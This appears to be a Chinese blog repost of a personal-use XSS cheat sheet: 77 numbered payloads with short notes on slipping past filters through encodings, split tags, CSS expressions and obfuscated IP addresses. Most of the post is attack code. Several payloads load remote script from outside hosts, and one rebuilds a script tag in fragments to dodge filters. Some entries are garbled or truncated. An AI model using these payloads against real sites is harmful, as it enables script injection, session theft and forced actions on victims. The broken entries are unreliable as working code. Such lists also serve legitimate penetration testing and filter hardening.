【自用】xsspayload

已于 2022-09-28 12:12:56 修改
阅读量444 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: xss
于 2022-09-28 11:18:21 首次发布
原文链接:t00ls.com
版权

貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。

(1)普通的XSS JavaScript注入

 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2)IMG标签XSS使用JavaScript命令

 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3)IMG标签无分号无引号

<IMG SRC=javascript:alert(‘XSS’)>

(4)IMG标签大小写不敏感

 <IMG SRC=JaVaScRiPt:alert(‘XSS’)>

(5)HTML编码(必须有分号)

 <IMG SRC=javascript:alert(“XSS”)>

(6)修正缺陷IMG标签

 <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>

(7)formCharCode标签(计算器)

 <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8)UTF-8的Unicode编码(计算器)

 <IMG SRC=jav..省略..S')>

(9)7位的UTF-8的Unicode编码是没有分号的(计算器)

 <IMG SRC=jav..省略..S')>

(10)十六进制编码也是没有分号(计算器)

 <IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>

(11)嵌入式标签,将Javascript分开

 <IMG SRC=”jav ascript:alert(‘XSS’);”>

(12)嵌入式编码标签,将Javascript分开

<IMG SRC=”jav ascript:alert(‘XSS’);”>

(13)嵌入式换行符

 <IMG SRC=”jav ascript:alert(‘XSS’);”>

(14)嵌入式回车

 <IMG SRC=”jav ascript:alert(‘XSS’);”>

(15)嵌入式多行注入JavaScript,这是XSS极端的例子

<IMG SRC=”javascript:alert(‘XSS‘)”>

(16)解决限制字符(要求同页面)

 <script>z=’document.’</script>
 <script>z=z+’write(“‘</script>
 <script>z=z+’<script’</script>
 <script>z=z+’ src=ht’</script>
 <script>z=z+’tp://ww’</script>
 <script>z=z+’w.shell’</script>
 <script>z=z+’.net/1.’</script>
 <script>z=z+’js></sc’</script>
 <script>z=z+’ript>”)’</script>
 <script>eval_r(z)</script>

(17)空字符

 perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out

(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用

 perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out

(19)Spaces和meta前的IMG标签

 <IMG SRC=” 
  javascript:alert(‘XSS’);”>

(20)Non-alpha-non-digit XSS

<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>

(21)Non-alpha-non-digit XSS to 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>

(22)Non-alpha-non-digit XSS to 3

 <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>

(23)双开括号

 <<SCRIPT>alert(“XSS”);//<</SCRIPT>

(24)无结束脚本标记(仅火狐等浏览器)

 <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25)无结束脚本标记2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26)半开的HTML/JavaScript XSS

 <IMG SRC=”javascript:alert(‘XSS’)”

(27)双开角括号

 <iframe src=http://3w.org/XSS.html <

(28)无单引号 双引号 分号

<SCRIPT>a=/XSS/
 alert(a.source)</SCRIPT>

(29)换码过滤的JavaScript

 \”;alert(‘XSS’);//

(30)结束Title标签

 </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>

(31)Input Image

 <INPUT SRC=”javascript:alert(‘XSS’);”>

(32)BODY Image

 <BODY BACKGROUND=”javascript:alert(‘XSS’)”>

(33)BODY标签

 <BODY(‘XSS’)>

(34)IMG Dynsrc

 <IMG DYNSRC=”javascript:alert(‘XSS’)”>

(35)IMG Lowsrc

 <IMG LOWSRC=”javascript:alert(‘XSS’)”>

(36)BGSOUND

在这里插入代码片

(37)STYLE sheet

 <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>

(38)远程样式表

 <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>

(39)List-style-image(列表式)

 <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS

(40)IMG VBscript

 <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS

(41)META链接url

 <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>

(42)Iframe

<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>

(43)Frame

 <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>

(44)Table

 <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>

(45)TD

 <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>

(46)DIV background-image

 <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>

(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)

<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>

(48)DIV expression

 <DIV STYLE=”width: expression_r(alert(‘XSS’));”>

(49)STYLE属性分拆表达

 <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>

(50)匿名STYLE(组成:开角号和一个字母开头)

 <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>

(51)STYLE background-image

<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>

(52)IMG STYLE方式

 exppression(alert(“XSS”))’>

(53)STYLE background

 <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>

(54)BASE

 <BASE HREF=”javascript:alert(‘XSS’);//”>

(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS

 <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>

(56)在flash中使用ActionScrpt可以混进你XSS的代码

 a=”get”;
 b=”URL(\”";
 c=”javascript:”;
 d=”alert(‘XSS’);\”)”;
 eval_r(a+b+c+d);

(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上

 <HTML xmlns:xss>
 <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
 <xss:xss>XSS</xss:xss>
 </HTML>

(58)如果过滤了你的JS你可以在图片里添加JS代码来利用

<SCRIPT SRC=””></SCRIPT>

(59)IMG嵌入式命令,可执行任意命令

 <IMG SRC=”http://www.XXX.com/a.php?a=b”>

(60)IMG嵌入式命令(a.jpg在同服务器)

 Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61)绕符号过滤

 <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>

(62)

 <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>

(63)

 <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>

(64)

 <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>

(65)

 <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>

(66)

 <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>

(67)

 <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>

(68)URL绕行

 <A HREF=”http://127.0.0.1/”>XSS</A>

(69)URL编码

 <A HREF=”http://3w.org”>XSS</A>

(70)IP十进制

 <A HREF=”http://3232235521″>XSS</A>

(71)IP十六进制

 <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>

(72)IP八进制

 <A HREF=”http://0300.0250.0000.0001″>XSS</A>

(73)混合编码
<A HREF=”h

 tt p://6 6.000146.0×7.147/”">XSS</A>

(74)节省[http:]

 <A HREF=”//www.google.com/”>XSS</A>

(75)节省[www]

 <A HREF=”http://google.com/”>XSS</A>

(76)绝对点绝对DNS

 <A HREF=”http://www.google.com./”>XSS</A>

(77)javascript链接

 <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
原味薯片精
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS payload大全
01-22
总结的XSSpayload,可以直接使用,直接进行攻击,各种payload
xsspayload.zip
06-10
xsspayload/xsspayload_fix(修改了值方便查看具体是哪句执行成功)/burpsuite/
xss-payload
weixin_45095113的博客
11-11 1004
xss攻击载荷
2024年网络安全最全【XSS平台】使用,简单 payload 项目的创建(1),分享一点面试小经验
2401_84301948的博客
05-11 673
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
终极万能XSS Payload
None安全团队
03-10 6141
前言: 在进行跨站脚本攻击的时候(xss),通常会需要我们通过插入的代码场景构造payload。就比较耗费时间,为了更方便的去测试漏洞,万能XSS payload就出现了 什么是万能XSS payload: 这里对它的定义就是 可以适应各种场景进行js代码执行的 payload,只需要有这一条payload即可(例如闭合html 闭合js) 下面我们来看看 payload长什么样子: jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=al...
XSS payload (大集合)
m0_51186260的博客
10-18 3027
<script>alert(/xss/)</script> <script>alert(&#38;XSS&#38;)</script> <script>alert(&quot;XSS&quot;)</script>(代替被转义的“”) <INPUT type="text"value='\'><SCRIPT>alert(String.fromCharCode(88,83,83))&l
自用自用自用自用自用自用自用
最新发布
07-14
请勿下载
光标自用光标自用光标自用光标自用光标自用
08-31
它们只是一串重复的"光标自用",这无法为我提供撰写详细IT知识的基础。同时,标签"自用"也无法明确指向某一特定的技术领域。压缩包子文件的文件名称列表中只有一个"新建文件夹",这也同样缺乏足够的信息来生成相关的...
自用leida项目111
02-16
【标题】"自用leida项目111" 暗示这可能是一个个人开发或学习用的项目,其中“leida”可能是项目名或特定技术的简称。由于信息有限,我们将从一般性的IT项目开发角度来探讨相关知识点。 【描述】 "自用leida项目111...
自用 FFmpeg 头文件
05-28
1、自己编译的 .so 文件上传到 一个相对来说下载速度较快的 网站 ,本人不想收取任何费用,但是这里 需要最少收取 5b 的费用; 2、压缩包内包含 与 .so 文件相关联的 头文件; 3、按需下载,不喜勿喷,谢谢。
eclipse自用
11-05
Eclipse 是一个开放源代码的、基于Java的可扩展开发平台。就其本身而言,它只是一个框架和一组服务,用于通过插件组件构建开发环境。幸运的是,Eclipse 附带了一个标准的插件集,包括Java开发工具(Java Development...
xss payload下载
04-03
多达5500多条xss payload提供下载,方便渗透测试人员更好地fuzz目标站点,检测xss漏洞是否存在
xss payload大全(实用)
热门推荐
Bul1et的博客
01-25 2万+
验证xss的时候总感觉姿势不够 这下好了   这么多  任你随便插 '&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; ='&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; &lt;script&gt;alert(document.cookie)&lt;/scrip...
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 682
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
XSS Playload 学习浏览器解码
lml_0916的博客
07-25 1314
通过网上的编码解析器可以查到“%6a%61%76%61%73%63%72%69%70%74%61%6c%65%72%74%28%31%29”这里采用URL编码的方式将javascriptalert(1)转成了上面的样子。js能识别的是Unicode编码,也能识别16进制编码,但是在js中不可以编码符号,所以这个也是不可以识别的,也就是说,咱们点击button按钮的时候是不会跳出弹窗的。这里采用的是js编码,使用的js的Unicode,并且他没有编码符号,所以是可以进行弹窗的。...
强大的XSS Payload
Killua
03-23 8916
1.构造post方式的html表单背景:某博客存在存储型xss漏洞操作:通过使用js脚本构造一个XSS Payload自动创建文章。实验的价值在于,只要成功了意味着可以模拟GET POST请求操作用户的浏览器。这在cookie劫持失败以后比较有用,如当受害者点击了恶意链接后,自己加载黑客的脚本,脚本模拟GET或者POST操作,这样就可以查看受害者的邮箱等待。实际上是模拟浏览器发送一个post给服务...
xss常用Payload总结
csd_ct的专栏
01-03 1万+
xss常用Payload总结 渗透测试时,常遇到页面输入框、留言板等输入交互点,大多是xss漏洞易出现的常见场景之一,记录几种常用的xss注入的姿势 1.img 注入 快速探测是否存在xss 1) <img src='x' onerror='alert(1)'> 2) <img src='x' onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))"> 2.iframe 注入 后台做了相
XSSpayload 常用构造和变形方法
吉吉的博客
03-06 1963
XSS 相关 payload 构造和变形的常用方法。
XSS过滤绕过手法与加载payload
NZXHJ的博客
07-29 1836
关于各类XSS注入过滤的绕过手法,以及利用XSS平台加载注入payload讲解
自用代码资源:设备状态枚举定义
"该资源是一个自用的代码片段,用于定义设备的不同状态,主要涉及到通话和充电等场景。" 在给定的代码中,我们看到一个条件编译块`#ifdef __BT_ONE_BRING_TWO__`,这通常用于区分不同的编译配置或针对特定平台的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值